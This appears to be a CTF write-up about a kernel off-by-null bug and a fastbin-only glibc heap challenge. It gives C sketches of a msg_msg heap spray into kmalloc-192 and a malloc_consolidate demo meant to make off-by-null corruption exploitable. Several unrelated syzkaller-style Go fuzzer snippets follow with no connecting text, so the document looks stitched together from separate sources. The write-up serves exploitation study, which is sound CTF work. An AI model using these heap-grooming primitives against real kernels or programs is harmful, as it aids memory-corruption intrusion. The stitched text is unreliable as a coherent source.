It was actually quite simple: just a simplified off-by-null. But I made a silly mistake: while heap-spraying pipe_buffer I miscalculated, the spray failed, and early on I gave up on that approach. I switched to msg_msg, whose messages sit on a doubly linked list, to create a UAF. Unfortunately, the off-by-null constraint forces the sprayed chunks to come from kmalloc-192 or below, which rules out many of the structures usually sprayed to obtain a write primitive; and pushing on with msg_msgseg for an arbitrary write also fails, because its leading next pointer means the object cannot be freed cleanly. In the end the challenge was still solved by constructing multi-level pipes.
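For reference, here is a minimal sketch of the msg_msg spray primitive (illustrative only, not the actual exploit: the queue count and payload size are my own choices, assuming a typical x86-64 kernel where the msg_msg header is 0x30 bytes, so a 0x90-byte payload lands the whole object in kmalloc-192, the largest cache the off-by-null constraint allows here):

```c
/* Sketch: spray msg_msg objects into kmalloc-192.
 * Assumes x86-64: sizeof(struct msg_msg) == 0x30, so header + 0x90
 * bytes of data == 0xc0 == 192 bytes. */
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define SPRAY_CNT 64              /* illustrative count */
#define PAYLOAD   (192 - 0x30)    /* data size so the object fits kmalloc-192 */

struct spray_msg {
    long mtype;
    char mtext[PAYLOAD];
};

int main(void)
{
    int qids[SPRAY_CNT];
    struct spray_msg msg = { .mtype = 1 };
    memset(msg.mtext, 'A', sizeof(msg.mtext));

    for (int i = 0; i < SPRAY_CNT; i++) {
        qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
        if (qids[i] < 0 || msgsnd(qids[i], &msg, sizeof(msg.mtext), 0) < 0) {
            perror("spray");
            return 1;
        }
    }
    /* ... trigger the off-by-null here, then msgrcv() to inspect
       neighboring objects for corruption ... */
    return 0;
}
```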
Here I want to highlight that heap challenge (I finished the kernel one at 4 a.m. and never got to it). A quick description of the bug: the edit function has an off-by-null, and the create function lets you allocate chunks without limit, but sizes are restricted to 0~0x78, so every chunk falls in the fastbin range. My first guess was that the exploitation had to involve the top chunk, but on closer inspection the preconditions for House of Force were not met. Near the end of the contest I read the glibc source and found a mechanism I had not known about. The branch below is from _int_malloc; the beginning of malloc_consolidate follows, and a small demo comes after the excerpt.
```c
  /*
     When we are using atomic ops to free fast chunks we can get
     here for all block sizes.
   */
  else if (atomic_load_relaxed (&av->have_fastchunks))
    {
      malloc_consolidate (av);
      /* restore original bin index */
      if (in_smallbin_range (nb))
        idx = smallbin_index (nb);
      else
        idx = largebin_index (nb);
    }
```

```c
static void
malloc_consolidate (mstate av)
{
  mfastbinptr *fb;              /* current fastbin being consolidated */
  mfastbinptr *maxfb;           /* last fastbin (for loop control) */
  mchunkptr p;                  /* current chunk being consolidated */
  mchunkptr nextp;              /* next chunk to consolidate */
  mchunkptr unsorted_bin;       /* bin header */
  mchunkptr first_unsorted;     /* chunk to link to */

  /* These have same use as in free() */
  mchunkptr nextchunk;
  INTERNAL_SIZE_T size;
  INTERNAL_SIZE_T nextsize;
  INTERNAL_SIZE_T prevsize;
  int nextinuse;

  /*
    Remove each chunk from fast bin and consolidate it, placing it
    then in unsorted bin. Among other reasons for doing this,
    placing in unsorted bin avoids needing to calculate actual bins
    until malloc is sure that chunks aren't immediately going to be
    reused anyway.
  */

  maxfb = &fastbin (av, NFASTBINS - 1);
  fb = &fastbin (av, 0);
  do {
      p = atomic_exchange_acq (fb, NULL);
      if (p != 0) {
          do {
              {
                if (__glibc_unlikely (misaligned_chunk (p)))
                  malloc_printerr ("malloc_consolidate(): "
                                   "unaligned fastbin chunk detected");
```
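To see the mechanism in action, here is a small userspace demo (a sketch, assuming glibc 2.26+ with tcache; chunk counts and sizes are illustrative). It fills the 0x70 tcache bin so that two further frees land in the fastbin, then issues a large request, which takes the path above and merges the two adjacent fastbin chunks into a single unsorted-bin chunk:

```c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    void *tcache_fill[7], *fast[2];

    /* Fill the 0x70 tcache bin (7 slots) so later frees go to the fastbin. */
    for (int i = 0; i < 7; i++)
        tcache_fill[i] = malloc(0x68);
    fast[0] = malloc(0x68);
    fast[1] = malloc(0x68);
    malloc(0x18);                /* guard: keep fast[1] away from top */

    for (int i = 0; i < 7; i++)
        free(tcache_fill[i]);    /* -> tcache */
    free(fast[0]);               /* -> 0x70 fastbin */
    free(fast[1]);               /* -> 0x70 fastbin */

    /* A large request with non-empty fastbins triggers
       malloc_consolidate(): the two adjacent fastbin chunks are merged
       into one 0xe0 chunk and placed in the unsorted bin. */
    malloc(0x500);

    /* This is served from the consolidated chunk, at fast[0]'s address. */
    void *merged = malloc(0xd0);
    printf("fast[0] = %p, merged = %p\n", fast[0], merged);
    return 0;
}
```

The demo uses a large request for simplicity, but as the comment in the excerpt says, this path can be reached for all block sizes, so it stays reachable even under the challenge's 0~0x78 cap. Once chunks leave the fastbins, prev_size and PREV_INUSE semantics apply to them again, which is presumably what makes the off-by-null exploitable despite being limited to fastbin sizes.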
```go
// Pool represents a set of test machines (VMs, physical devices, etc) of particular type.
type Pool interface {
    // Count returns total number of VMs in the pool.
    Count() int

    // Create creates and boots a new VM instance.
    Create(workdir string, index int) (Instance, error)
}
```
```go
type Report struct {
    // Title contains a representative description of the first oops.
    Title string
    // Alternative titles, used for better deduplication.
    // If two crashes have a non-empty intersection of Title/AltTitles, they are considered the same bug.
    AltTitles []string
    // Bug type (e.g. hang, memory leak, etc).
    Type Type
    // The indicative function name.
    Frame string
    // Report contains whole oops text.
    Report []byte
    // Output contains whole raw console output as passed to Reporter.Parse.
    Output []byte
    // StartPos/EndPos denote region of output with oops message(s).
    StartPos int
    EndPos   int
    // SkipPos is position in output where parsing for the next report should start.
    SkipPos int
    // Suppressed indicates whether the report should not be reported to user.
    Suppressed bool
    // Corrupted indicates whether the report is truncated or corrupted in some other way.
    Corrupted bool
    // CorruptedReason contains reason why the report is marked as corrupted.
    CorruptedReason string
    // Recipients is a list of RecipientInfo with Email, Display Name, and type.
    Recipients vcs.Recipients
    // GuiltyFile is the source file that we think is to blame for the crash (filled in by Symbolize).
    GuiltyFile string
    // reportPrefixLen is length of additional prefix lines that we added before actual crash report.
    reportPrefixLen int
    // symbolized is set if the report is symbolized.
    symbolized bool
}
```
```go
    mu                    sync.Mutex
    phase                 int
    targetEnabledSyscalls map[*prog.Syscall]bool

    candidates       []rpctype.Candidate // untriaged inputs from corpus and hub
    disabledHashes   map[string]struct{}
    corpus           map[string]CorpusItem
    seeds            [][]byte
    newRepros        [][]byte
    lastMinCorpus    int
    memoryLeakFrames map[string]bool
    dataRaceFrames   map[string]bool
    saturatedCalls   map[string]bool
```
```go
var (
    flagConfig = flag.String("config", "", "configuration file")
    flagDebug  = flag.Bool("debug", false, "dump all VM output to console")
    flagBench  = flag.String("bench", "", "write execution statistics into this file periodically")
)
```
```go
func (mgr *Manager) runRepro(crash *Crash, vmIndexes []int, putInstances func(...int)) *ReproResult {
    features := mgr.checkResult.Features
    res, stats, err := repro.Run(crash.Output, mgr.cfg, features, mgr.reporter, mgr.vmPool, vmIndexes)
    ret := &ReproResult{
        instances: vmIndexes,
        report0:   crash.Report,
        repro:     res,
        stats:     stats,
        err:       err,
        hub:       crash.hub,
    }
    if err == nil && res != nil && mgr.cfg.StraceBin != "" {
        // We need only one instance to get strace output, release the rest.
        putInstances(vmIndexes[1:]...)
        defer putInstances(vmIndexes[0])

        const straceAttempts = 2
        for i := 1; i <= straceAttempts; i++ {
            strace := repro.RunStrace(res, mgr.cfg, mgr.reporter, mgr.vmPool, vmIndexes[0])
            sameBug := strace.IsSameBug(res)
            log.Logf(0, "strace run attempt %d/%d for '%s': same bug %v, error %v",
                i, straceAttempts, res.Report.Title, sameBug, strace.Error)
            // We only want to save strace output if it resulted in the same bug.
            // Otherwise, it will be hard to reproduce on syzbot and will confuse users.
            if sameBug {
                ret.strace = strace
                break
            }
        }
    } else {
        putInstances(vmIndexes...)
    }
    return ret
}
```
```go
func prepareCtx(crashLog []byte, cfg *mgrconfig.Config, features *host.Features,
    reporter *report.Reporter, VMs int) (*context, error) {
    if VMs == 0 {
        return nil, fmt.Errorf("no VMs provided")
    }
    entries := cfg.Target.ParseLog(crashLog)
    if len(entries) == 0 {
        return nil, ErrNoPrograms
    }
    crashStart := len(crashLog)
    crashTitle, crashType := "", crash.UnknownType
    if rep := reporter.Parse(crashLog); rep != nil {
        crashStart = rep.StartPos
        crashTitle = rep.Title
        crashType = rep.Type
    }
    testTimeouts := []time.Duration{
        3 * cfg.Timeouts.Program, // to catch simpler crashes (i.e. no races and no hangs)
        20 * cfg.Timeouts.Program,
        cfg.Timeouts.NoOutputRunningTime, // to catch "no output", races and hangs
    }
    switch {
    case crashTitle == "":
        crashTitle = "no output/lost connection"
        // Lost connection can be detected faster,
        // but theoretically if it's caused by a race it may need the largest timeout.
        // No output can only be reproduced with the max timeout.
        // As a compromise we use the smallest and the largest timeouts.
        testTimeouts = []time.Duration{testTimeouts[0], testTimeouts[2]}
    case crashType == crash.MemoryLeak:
        // Memory leaks can't be detected quickly because of expensive setup and scanning.
        testTimeouts = testTimeouts[1:]
    case crashType == crash.Hang:
        testTimeouts = testTimeouts[2:]
    }
    ctx := &context{
        target:       cfg.SysTarget,
        reporter:     reporter,
        crashTitle:   crashTitle,
        crashType:    crashType,
        crashStart:   crashStart,
        entries:      entries,
        instances:    make(chan *reproInstance, VMs),
        bootRequests: make(chan int, VMs),
        testTimeouts: testTimeouts,
        startOpts:    createStartOptions(cfg, features, crashType),
        stats:        new(Stats),
        timeouts:     cfg.Timeouts,
    }
    ctx.reproLogf(0, "%v programs, %v VMs, timeouts %v", len(entries), VMs, testTimeouts)
    return ctx, nil
}
```
```go
func (ctx *context) repro() (*Result, error) {
    // Cut programs that were executed after crash.
    for i, ent := range ctx.entries {
        if ent.Start > ctx.crashStart {
            ctx.entries = ctx.entries[:i]
            break
        }
    }
    entries := ctx.entries

    // Extract last program on every proc.
    procs := make(map[int]int)
    for i, ent := range entries {
        procs[ent.Proc] = i
    }
    var indices []int
    for _, idx := range procs {
        indices = append(indices, idx)
    }
    sort.Ints(indices)
    var lastEntries []*prog.LogEntry
    for i := len(indices) - 1; i >= 0; i-- {
        lastEntries = append(lastEntries, entries[indices[i]])
    }
    for _, timeout := range ctx.testTimeouts {
        // Execute each program separately to detect simple crashes caused by a single program.
        // Programs are executed in reverse order, usually the last program is the guilty one.
        res, err := ctx.extractProgSingle(lastEntries, timeout)
        if err != nil {
            return nil, err
        }
        if res != nil {
            ctx.reproLogf(3, "found reproducer with %d syscalls", len(res.Prog.Calls))
            return res, nil
        }

        // Don't try bisecting if there's only one entry.
        if len(entries) == 1 {
            continue
        }

        // Execute all programs and bisect the log to find multiple guilty programs.
        res, err = ctx.extractProgBisect(entries, timeout)
        if err != nil {
            return nil, err
        }
        if res != nil {
            ctx.reproLogf(3, "found reproducer with %d syscalls", len(res.Prog.Calls))
            return res, nil
        }
    }

    ctx.reproLogf(0, "failed to extract reproducer")
    return nil, nil
}
```
```go
    fwdAddr, err := inst.Forward(mgr.serv.port)
    if err != nil {
        return nil, nil, fmt.Errorf("failed to setup port forwarding: %w", err)
    }

    fuzzerBin, err := inst.Copy(mgr.cfg.FuzzerBin)
    if err != nil {
        return nil, nil, fmt.Errorf("failed to copy binary: %w", err)
    }

    // If ExecutorBin is provided, it means that syz-executor is already in the image,
    // so no need to copy it.
    executorBin := mgr.sysTarget.ExecutorBin
    if executorBin == "" {
        executorBin, err = inst.Copy(mgr.cfg.ExecutorBin)
        if err != nil {
            return nil, nil, fmt.Errorf("failed to copy binary: %w", err)
        }
    }
```
```go
type Instance interface {
    // Copy copies a hostSrc file into VM and returns file name in VM.
    Copy(hostSrc string) (string, error)

    // Forward sets up forwarding from within VM to the given tcp
    // port on the host and returns the address to use in VM.
    Forward(port int) (string, error)

    // Run runs cmd inside of the VM (think of ssh cmd).
    // outc receives combined cmd and kernel console output.
    // errc receives either command Wait return error or vmimpl.ErrTimeout.
    // Command is terminated after timeout. Send on the stop chan can be used to terminate it earlier.
    Run(timeout time.Duration, stop <-chan bool, command string) (outc <-chan []byte, errc <-chan error, err error)

    // Diagnose retrieves additional debugging info from the VM
    // (e.g. by sending some sys-rq's or SIGABORT'ing a Go program).
    //
    // Optionally returns (some or all) of the info directly. If wait == true,
    // the caller must wait for the VM to output info directly to its log.
    //
    // rep describes the reason why Diagnose was called.
    Diagnose(rep *report.Report) (diagnosis []byte, wait bool)
}
```